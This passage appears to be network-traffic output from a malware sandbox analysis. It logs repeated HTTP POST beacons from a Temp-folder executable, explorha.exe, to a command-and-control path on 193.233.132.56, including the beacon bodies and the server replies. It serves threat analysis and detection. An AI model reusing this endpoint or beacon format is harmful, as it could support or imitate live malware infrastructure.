                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:54.783443928 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:54 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    60192.168.2.449796193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:55.193486929 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:55.441860914 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:55 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:55.443481922 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:55.703181982 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:55 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    61192.168.2.449797193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:56.060647964 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:56.300904036 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:56 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:56.301580906 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:56.546212912 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:56 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    62192.168.2.449798193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:56.906132936 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:57.150888920 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:57 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:57.232080936 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:57.482543945 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:57 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    63192.168.2.449799193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:57.841542006 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:58.092560053 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:57 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:58.093727112 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:58.341651917 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:58 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    64192.168.2.449800193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:58.701791048 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:58.946474075 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:58 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:58.947127104 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:59.195704937 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:59 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    65192.168.2.449801193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:59.542757034 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:59.784626007 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:59 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:59.785403013 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:27:00.030515909 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:59 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    66192.168.2.449802193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:27:00.395750046 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:27:00.645138025 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:27:00 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:27:00.645859957 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:27:00.902956009 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:27:00 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    67192.168.2.449803193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:27:01.270315886 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:27:01.518929958 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:27:01 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:27:01.519572020 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:27:01.772444010 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:27:01 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    68192.168.2.449804193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:27:02.124907017 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:27:02.370692968 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:27:02 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:27:02.386272907 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:27:02.636826992 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:27:02 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    69192.168.2.449805193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:27:02.986154079 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:27:03.233387947 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:27:03 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    70192.168.2.449806193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:27:03.484750032 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:27:03.738102913 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:27:03 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
